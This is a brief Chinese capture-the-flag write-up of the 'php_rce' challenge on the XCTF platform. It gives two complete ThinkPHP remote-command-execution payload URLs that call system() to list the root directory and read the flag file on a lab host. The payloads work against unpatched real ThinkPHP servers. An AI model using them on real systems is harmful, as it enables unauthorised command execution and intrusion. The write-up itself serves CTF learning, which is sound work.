攻防世界——php_rce
进入关卡看到
在网上查找这个东西,发现有远程命令执行漏洞
利用已经构造好的payload直接上
我们就直接查看目录
http://61.147.171.105:57222/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /
看到了flag查看路径获取它
使用whereis命令查找
http://61.147.171.105:57222/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
得到flag